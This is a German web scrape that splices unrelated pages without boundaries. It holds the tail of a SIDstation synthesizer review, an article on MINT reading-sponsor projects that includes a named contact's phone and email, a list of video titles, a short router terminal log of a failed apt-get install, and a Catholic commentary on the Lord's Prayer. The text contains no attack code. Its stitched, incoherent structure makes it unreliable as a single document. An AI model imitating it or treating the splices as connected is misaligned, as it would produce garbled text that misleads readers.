Was es offenbar nicht geben wird, sind Software-Hüllkurven zur Steuerung von z.B. Tonhöhe oder Filterfrequenz. Schade. Erstens müsste man nur die "Modulator"-Sourcen studieren und zweitens ist dies schlichtweg ein Muss, wie sonst sollte man "gezupfte", bläserartige oder perkussive Klänge realisieren?

Apropos Klänge: Derzeit gibt es keine Möglichkeit, erstellte Klänge außerhalb der SIDstation zu archivieren. Die einzige Möglichkeit, diese dauerhaft (d.h. über die Lebensdauer der internen Batterie hinweg) zu speichern, ist Papier und Bleistift - was übrigens ebenfalls die einzige Möglichkeit ist, Klänge zwischen SIDstations auszutauschen. Auch dies soll sich aber mit einer späteren Softwareversion ändern, und so komme ich zum

Support

Support wird bei Elektron ESI AB groß geschrieben, wie ich selbst am eigenen Leibe erfahren musste. Nicht nur, dass man auf eine spätabends geschriebene Mail fast umgehend (!) eine Antwort erhält, nein, man wird auch ständig per Mail-Verteiler auf dem neuesten Stand gehalten. Bekommt man einmal ein "Liefern wir nach!" als Antwort, kann man sicher sein, dass dies auch innerhalb der nächsten Tage geschieht; und so werden auch die Käufer der ersten SIDstation-Generation nicht vergessen, sie bekommen kostenlose Updates ihrer Systemsoftware - ein Service, der heutzutage leider bei vielen Firmen in Vergessenheit geraten ist.

Fazit

Als aktiver Homerecorder, der dieses Hobby nunmehr seit über 11 Jahren betreibt, musste ich beim Durchlesen der diversen Informationen zur SIDstation schmunzeln, teilweise den Kopf schütteln ob der Begriffsverwirrung (ein Arpeggiator gehört einfach nicht zur Synthese) und der Überschätzung der klanglichen Qualitäten der SIDstation. Ein SID bleibt ein SID, selbst wenn man ihn auf Hochglanz poliert - was die SIDstation zugegebenermaßen sehr schön tut. Dennoch wird kein high-end Synthesizer daraus, schon gar nicht zu einem Preis, zu dem man wirklich gute (und polyphone!) Geräte auf dem Gebrauchtmarkt bekommt. Auch zeugen die Aussagen, die mir gegenüber per eMail gemacht wurden, davon, dass sich die Jungs von Elektron ESI AB sich im Musikgerätemarkt nicht unbedingt auskennen, z.B. erhielt ich denn auf meine Frage, ob und wie man denn den unterschiedlichen Filtercharakteristiken der SID-Chips begegnet, von Daniel Hansson die Antwort, dass dies doch gar keine Rolle spiele, denn es hätte ohnehin niemand mehr als nur eine SIDstation. Dass so aber ein Klangprogramm auf jeder SIDstation anders klingen würde (und wie dramatisch der Unterschied sein kann, zeigte 1986 Chris Hülsbeck mit "Shades"), scheint entweder nicht von Interesse zu sein oder man hofft, dass niemand danach fragt - für den Einsatz in professionellen Studios ein absolutes K.O.-Kriterium.

Ich mag Lo-Fi Sound, drum habe ich mir auch gerade erst einen 8Bit-Drumcomputer gekauft - aber würde ich mir eine SIDstation kaufen? Ich denke nicht, denn jeder gebrauchte Analogsynthesizer ist klanglich besser - und in Kombination mit dem Oberheim Cyclone hat man auch Arpeggiator-Fähigkeiten, die die SIDstation vermutlich nie erreichen wird.

Hätten Sie's doch bei der Aussagen "...but now we're doing it for our own fun" belassen - die SIDstation würde von mir höchste Noten erhalten. Doch als Konkurrenzprodukt zu "amtlichen" Synthesizern kann sie leider nur verlieren, besonders wenn man den Mund dann auch noch so voll nimmt, wie es jeder auf der SIDstation-Homepage nachlesen kann.

Bleibt die Frage: Wer kauft sich eine SIDstation? Höchstens SID-Enthusiasten, die diesen unverwechselbaren Sound in höchster Qualität genießen wollen - und derer gibt es offenbar viele, wie die Lobeshymnen auf www.sidstation.de beweisen.

Abdruck mit freundlicher Genehmigung der Zeitschrift ´GO64!´, Cosowi Verlag

Quellen:
[1] Homepage von Elektron ESI AB (http://www.sidstation.com)
[2] Korrespondenz mit Daniel Hansson, Elektron ESI AB
[3] Klangbeispiele (via http://www.sidstation.com)
[4] Bedienungsanleitung (via http://www.sidstation.com)
[5] Interview mit Bob Yannes (Andreas Varga, 1996, http://stud1.tuwien.ac.at/~e9426444/yannes.html)


Weiterführende Links bei MEMI:



Weitere Tests bei MEMIs Equipment & Recording
MEMI Makers Link-Datenbank
MEMI bietet Tipps & Tricks fürs Homerecording!
Tools und Sounds gibts bei den Downloads.

Autor: Rainer Buchty Ein Service von MEMI.

Nachts im Mondschein lag auf einem Blatt ein kleines Ei

<!DOCTYPE html> MINT-Bildung und Sprachförderung – eine Verbindung, die in jedem Land funktioniert - Elternbildung Zum Inhalt Zum Menü

Farbiger Bogen Farbiger Bogen Ei Schwerpunktthemen Zahnrad Lupe Share on Twitter Twitter Logo Share on Facebook Facebook Logo Share via E-Mail E-Mail Pfeil lang Pfeil nach unten Pfeil nach links Pfeil nach rechts Karte mit Marker Newsletter Links Bestellservice Literaturtipps Studien Elternbildung Login/Logout Hand Schließen Marker mit Hand YouTube Ei-Rahmen für Bilder info forum head helpdesk home info list logout message student task upload add burger burger_close courses delete download edit check link media preview preferences-elearning image share play-store-icon app-store-icon

MINT-Bildung und Sprachförderung – eine Verbindung, die in jedem Land funktioniert

von Stefanie Thate

Elternbildung
Elternbildung
Elternbildung

„Nachts, im Mondschein, lag auf einem Blatt ein kleines Ei…“. So lautet der erste Satz des Kinderbuchklassikers „Die kleine Raupe Nimmersatt“, den sehr viele kleine und große Bilderbuchfans weltweit auswendig zitieren können. Die Erlebnisse der kleinen hungrigen Raupe, die aus einem Ei schlüpft und sich auf die Suche nach etwas Essbarem macht, werden seit 50 Jahren in mindestens 45 verschiedenen Sprachen immer wieder vorgelesen.

Dem Autor Eric Carle ist es eindrucksvoll gelungen, wenig Text, farbenfrohe Bilder und aktivierende Mitmach- und Lernelemente in Einklang zu bringen. Zahlreiche Wiederholungen und eine fantasievolle Gestaltung animieren (Vor-)leser und Zuhörer gleichermaßen. Während sich die nimmersatte Raupe durch unterschiedliche Lebensmittel futtert, lernen die Kinder spielerisch erste Wörter, Zahlen und Vorgänge aus der Natur kennen. Gemeinsam mit dem Vorleser oder der Vorleserin können sie darüber hinaus überlegen, wovon sich Raupen in der freien Natur ernähren und was passiert, wenn sie dann doch endlich einmal satt sind.

Der Bilderbuch-Klassiker bietet beste Voraussetzungen für lebendiges Vorlesen, Mitlesen, Benennen, Zählen, Wiegen und Nachforschen. Er begeistert Kinder durch das Vorlesen für naturwissenschaftliche Phänomene und fördert die Sprach- und Lesekompetenz.

Genau das ist auch das Ziel von „MINT-Vorlesepaten“, einem Kooperationsprojekt von Deutscher Telekom Stiftung und Stiftung Lesen.

Das Projekt basiert auf wissenschaftlichen Studien, die zeigen, dass sich die Sprach- und Lesekompetenz von Kindern fördern lässt, wenn sie sich mit mathematisch-naturwissenschaftlich-technischen Fragestellungen beschäftigen. Das Forschen führt zu einem großen Interesse an Sprache und Kommunikation, denn die Kinder wollen untersuchte Phänomene benennen, beschreiben, Vermutungen ausdrücken und diskutieren.

Tipps für geeignete Medien-Empfehlungen (Bücher und Vorlese-Apps) und einfach umzusetzende Anschlussaktionen bieten die beiden Stiftungen kostenlos zum Download an. Darüber hinaus stehen Kurzvideos mit weiteren Erläuterungen zu einzelnen Themen zur Verfügung, z. B. Aktionen zum Thema Farben, Naturphänomene oder Riechen und Schmecken. Der oder die Vorleserin muss also kein MINT-Experte sein, sondern sollte einfach nur Freude am (Vor-)Lesen und gemeinsamen Entdecken mitbringen. Bisher haben sich bereits über 2.630 MINT-Vorlesepatinnen und MINT-Vorlesepaten für ein solches Engagement entschieden.

Die Deutsche Telekom Stiftung engagiert sich seit 2016 auch in Mittel-, Ost- und Südosteuropa für gute MINT-Bildung. Im Projekt „MINT-Vorlesepaten“ stehen in verschiedenen Ländern erfahrene Partner für die Umsetzung vor Ort an ihrer Seite.
Seit November 2018 arbeitet die Stiftung mit der rumänischen Progress Foundation zusammen. Gemeinsam schaffen die beiden Partner ein niedrigschwelliges Angebot, um Kinder in Rumänien über das Vorlesen für MINT-Themen zu begeistern.

Die konkrete Umsetzung des Vorhabens „Ora sa STIM“ in Rumänien liegt bei der Progress Foundation. Trainer der Stiftung haben rund 150 Bibliothekare darin geschult, das Vorlesen altersgerechter Kinderbücher mit MINT-Bezug um spannende Anschlussaktionen zu ergänzen. Die Bibliothekare führen wöchentlich MINT-Vorleseaktionen für Kinder zwischen drei und zehn Jahren durch. Hierfür erhalten sie Materialien, Medien- und Aktionstipps und kostenlose Bücherboxen. Die inzwischen 155 Bibliotheken berichten kontinuierlich über ihre Erfahrungen, Erkenntnisse und Herausforderungen bei der Durchführung der MINT-Vorleseaktionen in einer projekteigenen Facebook-Gruppe. Die Vernetzung der Teilnehmer untereinander und die Förderung des Wissens- und Erfahrungsaustauschs sind zentrale Elemente für den Erfolg und die Kontinuität.

In Polen kooperiert die Telekom-Stiftung mit der polnischen Information Society Development Foundation (IFRS). Unter dem Titel „Para – buch! Książka w ruch!“ werden rund 100 Tandems aus Bibliothekaren und Ehrenamtlern gebildet und geschult. Anschließend bieten sie zweiwöchentlich MINT-Vorleseaktionen für Kinder zwischen drei und zehn Jahren in „MINT-Vorlese-Clubs“ in Bibliotheken an. Unterstützt werden sie durch Medien- und Aktionstipps sowie Materialien. Als Freiwillige sollen vor allem Menschen mit einem naturwissenschaftlich-technischen Hintergrund gewonnen werden, z. B. Ingenieure oder Handwerker, die ihr Wissen und ihre Erfahrungen über MINT-Vorleseaktionen an Kinder weitergeben.

Über diese konkreten Kooperationen in Rumänien und Polen hinaus, unterstützt die Deutsche Telekom Stiftung weitere Aktivitäten zur Verbindung von MINT und Sprache in Österreich, der Slowakischen Republik, Spanien, Südtirol und Belgien. Die Ansätze in den jeweiligen Ländern sind unterschiedlich.

In Österreich adressiert das Österreichische Bibliothekswerk über „MINT: lesen – sprechen – tun“ Bibliothekare, Vorlesepaten, Eltern und Pädagogen die kindliche Neugier durch das Vorlesen ausgewählter Medien und leicht zu realisierender Versuche zu wecken. Ergänzend haben Kindergärten und Grundschulen in Salzburg und Wien die Möglichkeit MINT-Themenboxen bestehend aus Büchern, Materialien und Bilderbuchkinos kostenfrei auszuleihen.

Spannende Ansätze naturwissenschaftliche Themen schon ganz früh in Eltern-Kind-Gruppen mitzudenken, hat das Forum Katholischer Erwachsenenbildung in Österreich unter dem Titel „MINI-MINT“ entwickelt. Die Idee dahinter: In und mit den Familien wird der Grundstein für Bildungs-Begeisterung bzw. MINT-Begeisterung gelegt. In zahlreichen Eltern-Kind-Gruppen werden bereits vielfältige MINT-Themen altersgerecht und spielerischer bedient, z. B. mein Körper, Tiere, Farben. Da setzt die Handreichung „MINI-MINT: von Anfang an die Welt entdecken“ an, die zu zehn verschiedenen Themen entwickelt worden ist.

Die gewinnbringende Verbindung von MINT und Sprache wird in der Slowakischen Republik durch das Goethe-Institut Bratislava genutzt, um Kinder, die Deutsch als Fremdsprache lernen, zu unterstützen. Über anregende naturwissenschaftliche und technische Inhalte, die kreativ und spielerisch aufgegriffen werden wird das Interesse an der „neuen“ Sprache gesteigert.

Die Beispiele verdeutlichen, dass die Verbindung von MINT-Themen und Sprachförderung sich gewinnbringend miteinander verbinden lässt:

  • unabhängig von der Muttersprache,
  • an verschiedenen Orten,
  • durch unterschiedliche Personen und
  • mit wenig Ressourcen.

Ansprechpartner:
Stefanie Thate
Projektleiterin „MINT-Vorlesepaten“ Deutsche Telekom Stiftung
Mobil: +49 171 81 84923
E-Mail: stefanie.thate@telekom-stiftung.de

Weitere Informationen unter:

www.telekom-stiftung.de/mint-vorlesepaten

www.netzwerkvorlesen.de/mint

www.facebook.com/orasastim

http://frsi.org.pl/para-buch-ksiazka-w-ruch-pilotaz-projektu-promujacego-czytelnictwo/

http://www.biblio.at/blog/?p=2488

https://www.goethe.de/ins/sk/de/index.html

 


KommentareElternbildung

Derzeit gibt es noch keine Kommentare zu dieser Stimme


Schreiben Sie einen Kommentar

Ihre E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

*

Diese Website verwendet Cookies, um Ihnen den bestmöglichen Service zu gewährleisten. Durch die Nutzung dieser Website erklären Sie sich mit der Verwendung von Cookies einverstanden. Detaillierte Informationen finden Sie in unserer Datenschutzerklärung.

Ich stimme zu


Edward Snowden und die Rueckkehr

normal_normal_20190925_020114.jpg
The Cranberries - Zombie [Lost Sky Remix]

normal_signal-2019-09-23-144012.jpg

Indianer Jones Longplay

Monkey Island 2 - Longplay HD


Sam und Max - Hit The Road Point und Click Adventure

Sam & Max - Hit The Road

Lets Play Vollgas - Full Throttle German - Die Introduction - Der Hinterhalt

Lets Play Vollgas - Full Throttle German - Die Introduction - Der Hinterhalt

Day of Tentacle - 1993 PC Longplay

Day Of Tentacle - 1993 - Longplay (PC>

gillian_bower und How to make best slime

Dittsche - Corona Virus


Diskussion Seite II

[2] Dikussion Seite II

Pippi in Taka Tuka Land 1 Stunde 40 von 1970 Franzoesisch

Pippi in Taka Tuka Land - 1970

Pippi Langstrumpf - Deutsch ganzer Film

Pippi Langstrumpf - Ganzer Film

Pippi Langstrumpf's Streiche - Titelsong

Pippi's Streiche - Titelsong MP3

Samy Deluxe - Dis Wo Ich Herkomm!

Samy Deluxe - Dis Wo Ich Herkomm!

Swimmy das Lied

Swimmy der Fisch

Nur zusammen sind wir stark, glücklich und frei sagt Swimmy der Fisch
normal_bonifatiusschule-0909.jpg

Pippi Langstrumpf - Heute!

So schaut Pippi Langstrumpf heute aus!

Die Fanta 4 zum Corona Virus

Die Fantastischen Vier - Corona /News/Ansprache

KM - CHANNEL - AICHA - Cheb Khaled

CHEB Khaled - AICHA - KM Channel

Caritas Hack Fulda von Japan aus

Mashup Germany - My bitter Cheap Symphony

Hacking_Music_Cover_Vol1-1.png

RB500

edge:/mnt/cfa4# uname -a
Linux edge 4.14.180 #1 Tue Jun 9 09:32:04 CEST 2020 mips GNU/Linux
edge:/mnt/cfa4# 
edge:/mnt/cfa4# 
edge:/mnt/cfa4# 
edge:/mnt/cfa4# 
edge:/mnt/cfa4# 
edge:/mnt/cfa4#
edge:/mnt/cfa4#
edge:/mnt/cfa4#
edge:/mnt/cfa4# wlan0: No active IBSS STAs - trying to scan for other IBSS networks with same SSID (merge)
apt-get install freeradius
apt-get: /usr/local/lib/liblzma.so.5: no version information available (required by /usr/lib/mipsel-linux-gnu/libapt-p)
wlan0: No active IBSS STAs - trying to scan for other IBSS networks with same SSID (merge)
wlan0: No active IBSS STAs - trying to scan for other IBSS networks with same SSID (merge)
wlan0: No active IBSS STAs - trying to scan for other IBSS networks with same SSID (merge)
wlan0: No active IBSS STAs - trying to scan for other IBSS networks with same SSID (merge)
do_page_fault(): sending SIGSEGV to apt-get for invalid read access from 00000000
epc = 77a1cec4 in libc-2.19.so[77994000+16b000]
ra  = 77e85090 in libapt-pkg.so.4.12.0[77d43000+185000]
Segmentation fault
edge:/mnt/cfa4# wlan0: No active IBSS STAs - trying to scan for other IBSS networks with same SSID (merge)

edge:/mnt/cfa4# apt-get ins^C
edge:/mnt/cfa4# nano /etc/apwlan0: No active IBSS STAs - trying to scan for other IBSS networks with same SSID (merge)

Gebet - Vater Unser im Himmel

Von Margret Nußbaum |  Bonn - 25.03.2020

Das Vaterunser ist das im Christentum am weitesten verbreitete Gebet, das Jesus Christus seine Jünger selbst gelehrt hat. Es ist das meist gesprochene Gebet der Christen in aller Welt. Sehr viel Substanz steckt in diesem Gebet. Die folgende Betrachtung erklärt nicht nur die Bedeutung des Vaterunser, sondern soll auch zum Nachdenken und Meditieren anregen.
Der Text des Vaterunser

Vater unser im Himmel,
geheiligt werde dein Name.
Dein Reich komme.
Dein Wille geschehe,
wie im Himmel so auf Erden.
Unser tägliches Brot gib uns heute.
Und vergib uns unsere Schuld,
wie auch wir vergeben unsern Schuldigern.
Und führe uns nicht in Versuchung,
sondern erlöse uns von dem Bösen.
Denn dein ist das Reich und die Kraft
und die Herrlichkeit in Ewigkeit.
Amen.
Die Betrachtung des Vaterunser

Vater unser im Himmel

Wir dürfen Gott Vater nennen, denn durch die Taufe und durch den Glauben an Jesus Christus sind wir zu Kindern Gottes geworden. Gott, unser Vater, kennt uns von Mutterleib an, er hat uns geformt, uns ins Leben gerufen. Und in der Taufe hat er uns zugesagt: "Ich habe dich bei deinem Namen gerufen. Du bist mein." (Jesaja 43,1)

Wir gehören alle zu Gottes Familie, und deshalb beten wir auch nicht "Mein Vater", sondern "Vater unser im Himmel". Jesus ruft uns in die Gemeinschaft seiner Jüngerinnen und Jünger. Er war den ersten von ihnen ein guter Lehrer und Ratgeber. Und sie haben uns alles, was er gelehrt und bewirkt hat, als Vermächtnis hinterlassen. In der Gemeinschaft derer, die mit uns im Namen des Vaters, des Sohnes und des Heiligen Geistes getauft sind, üben wir Nächstenliebe, die Bereitschaft, andere anzunehmen, wie sie sind, und auch denen zu vergeben, die uns das Leben schwer machen. Keine leichte Aufgabe – aber wir dürfen der Hilfe Gottes, unseres Vaters sicher sein.

Geheiligt werde dein Name

Gottes Namen zu heiligen, heißt, Gott zu verehren, ihn zu lobpreisen – im Gebet, aber auch in den Handlungen unseres Alltags. Nehme ich mir täglich Zeit fürs Gebet? Für ein "Dank sei Gott!", wenn eine Sache gut ausgegangen ist? Für ein "Bleib bei mir, Gott!", wenn ich vor einer schwierigen Aufgabe stehe? Für ein "Verlass mich nicht, Gott!", wenn ich einen Schicksalsschlag hinnehmen muss? Lebe ich so, dass ich mir der Würde bewusst bin, die Gott mir in der Taufe mit seiner Zusage verliehen hat: "Du bist mein geliebtes Kind"? Bemühe ich mich, ehrfürchtig von Gott, meinem Vater, zu reden? Behandle ich andere mit Liebe und Respekt, weil Gott mich so innig liebt, dass er auch dann nicht von mir lässt, wenn ich mich von ihm abwende?
Betendes Mädchen beim Kindergottesdienst in der Kirche von Titicachi, Bolivien.
Bild: © Adveniat/Achim Pohl

Das Vaterunser wird weltweit gebetet, auch beim Kindergottesdienst in der Kirche von Titicachi, Bolivien.

Dein Reich komme

Was meinen wir, wenn wir beten "Dein Reich komme"? Betrachten wir unsere Welt, fällt es uns schwer, das Reich Gottes darin zu erkennen. Wir sehen Krieg, Terror, Gewalt, Krankheit, Leid und Tod. Täglich lesen wir in den Zeitungen von Korruption, Mord, Totschlag, Katastrophen. Wir sehen zerrüttete Familien, Kinder, um die sich niemand kümmert, wir hören von Hunger und Elend in den Entwicklungsländern.

Als gläubige Christen befinden wir uns mittendrin in einem riesigen Widerspruch. Wir spüren die Verbindung zu Gott, erleben sein Wirken in und an uns. Andererseits fühlen wir uns hilflos in einer immer gottloser werdenden Welt, die ihre eigenen Regeln hat, die Gott außen vor lässt. Mit der Bitte "Dein Reich komme" gehen wir ein Versprechen ein, nämlich alles zu tun, was in unserer Macht steht, die Welt ein klein wenig menschlicher und gottgefälliger zu gestalten – Tag für Tag aufs Neue, ohne zu resignieren.

Dein Wille geschehe, wie im Himmel so auf Erden

Was wäre, wenn Jesus gebetet hätte "Hilf mir, meinen Willen durchzusetzen und das zu tun, was ich mir vornehme!"? Was passiert, wenn ich immer nur mich und meinen eigenen Weg sehe - ohne Rücksicht darauf, ob ich andere mitnehme oder stehen lasse? Es wäre kein guter Lebensweg – ohne Besinnung auf den Willen Gottes und ohne darauf zu hören, was mir Gott, mein Vater, sagen möchte. Jede und jeder hat öfter schon erfahren, dass sich das Durchkreuzen eigener Pläne im Nachhinein als Segen erwiesen hat. Dass man feststellen musste: Zum Glück ist es so gekommen und nicht, wie ursprünglich geplant. Ist der Gedanke daran, dass Gott da vielleicht seine Hand im Spiel hatte, wirklich ausgeschlossen? Immerhin hat er sich etwas dabei gedacht, als er uns erschaffen und uns Talente und Fähigkeiten mit auf den Weg gegeben hat. Versuchen herauszufinden, was Gott von uns will, können wir vor allem im Gebet. Vielleicht offenbart er uns öfter seinen Willen, als wir es bisher wahrgenommen haben. Beten hilft, alle Sinne zu schärfen und (wieder) einen neuen Blick auf unsere Gottesbeziehung zu erhalten. Wenn wir beten "Dein Wille geschehe, wie im Himmel, so auf Erden", bitten wir Gott, uns zu lenken und uns – wie das Navigationssystem unseres Autos - auf den richtigen Weg zurückzuführen.
Video: © katholisch.de

Die Dominikanerin Schwester Ursula Hertewich aus Koblenz betet das "Vater unser" und erklärt, was das Gebet bedeutet.

Unser tägliches Brot gib uns heute

Gott nimmt Anteil, wenn wir uns um unser tägliches Brot, um unseren Arbeitsplatz, um unsere Gesundheit und die unserer Familie sorgen, wenn wir unter Existenzängsten leiden. Er nimmt uns in unserem Alltag wahr. Welcher Vater sorgt sich nicht um seine Kinder?! Es ist gut, Gott jeden Tag um das Notwendige für unser Leben, unsere Erfüllung, unser Glück zu bitten, darauf zu vertrauen, dass er uns gibt, was wir brauchen. Um dieses Vertrauen in die Güte des Vaters geht es in dieser Bitte des Vaterunsers. Aber auch der Blick über unseren Tellerrand hinaus ist dabei wichtig. Wenn wir beten „Unser tägliches Brot gib uns heute“, denken wir nicht nur an uns, unsere Familie, unsere Freunde, sondern vor allem auch an Menschen, die nicht wissen, wo sie heute ihr tägliches Brot herbekommen sollen. Die Nahrung auf unserem Planeten ist ungerecht verteilt. Die Gier der Reichen nimmt den Armen jegliche Lebensgrundlage. Daran erinnert uns die Bitte des Vaterunsers um das tägliche Brot. Sie soll uns zur Geschwisterlichkeit aufrufen mit Menschen, denen es am Nötigsten fehlt.

Und vergib uns unsere Schuld, wie auch wir vergeben unsern Schuldigern

Was dies konkret bedeutet, erzählt Jesus im Gleichnis vom unbarmherzigen Gläubiger (Matthäus 18,23-35): Ein König hat Mitleid mit einem Diener und erlässt ihm die ganze Schuld. Der Diener aber lässt einen andern, der ihm Geld schuldet, ins Gefängnis werfen. Der König wird zornig und übergibt den Diener, dem er die Schuld erlassen hatte, den Folterknechten. Die Goldene Regel, die in vielen Religionen Maßstab ethischen Handelns ist, bringt die Bitte des Vaterunsers und das Gleichnis Jesu auf den Punkt: Behandle andere so, wie du auch behandelt werden möchtest. Natürlich ist das nicht immer einfach. Wie sollen wir jemandem verzeihen, der uns so tief verletzt hat, dass wir die dadurch zugefügten Verletzungen nur durch therapeutische Hilfe heilen können? Doch Gott überfordert niemanden. Wir dürfen mit allem zu ihm kommen – auch mit unserem Unvermögen zu verzeihen. Aber wir können ihn bitten, uns zu helfen, im Laufe der Zeit versöhnlicher gestimmt zu sein. Und wir können sicher sein, dass er uns unsere Sünden vergibt – auch unsere Schwierigkeiten mit dem Versöhnen. Wer auch immer Gott um Vergebung bittet, dem wird vergeben. Im ersten Johannesbrief (1,9) heißt es: "Wenn wir unsere Sünden bekennen, ist er treu und gerecht; er vergibt uns die Sünden und reinigt uns von allem Unrecht."
Video: © katholisch.de

Was bedeutet Beten? Ein Beitrag der Serie "Katholisch für Anfänger".

Und führe uns nicht in Versuchung, sondern erlöse uns von dem Bösen

Wir alle haben den Willen zum Guten in uns. Wenn da nicht die vielen kleinen und größeren Versuchungen wären, die uns anders handeln und reden lassen, als wir es uns eigentlich vorgenommen hatten: Sich für die gemobbte Kollegin stark machen? "Sie hat selber Schuld an der Situation. Soll sie doch schauen, wie sie klar kommt!" - "Meinem Bruder mitsamt Familie auf dem Weg in den Urlaub Quartier bei mir zu Hause bieten? Das ist mir viel zu lästig. Da sag ich besser, dass ich gar nicht zu Hause bin." - "Meiner Mutter am Telefon geduldig zuhören? Das nervt doch nur, da nehme ich besser erst gar nicht den Hörer ab, wenn ich ihre Nummer auf dem Display erkenne." Jede und jeder von uns kann da auf eine ganze Reihe von Versuchungen zurückblicken. "Erlöse uns von dem Bösen": Das Böse ist mitten unter uns. Auch Jesus hat es zu spüren bekommen, als er in der Wüste vom Teufel versucht wurde. Betend widersagte er den Verlockungen des Bösen. Und so lehrt uns diese Vaterunser-Bitte, dass wir nur den Versuchungen des täglichen Lebens, den Einflüsterungen des Bösen entkommen und sie entlarven können, wenn wir Gott inständig darum bitten.

Von Margret Nußbaum
Vater unser - Notre Père - Padre nuestro

Zehn Personen haben für katholisch.de das meistgesprochene Gebet der christlichen Welt in verschiedenen Sprachen gesprochen.
Das Vater unser in verschiedenen Sprachen

Aktualisiert am 25. März 2020.
Schlagworte

Bibel Glaube Kirche Religion Theologie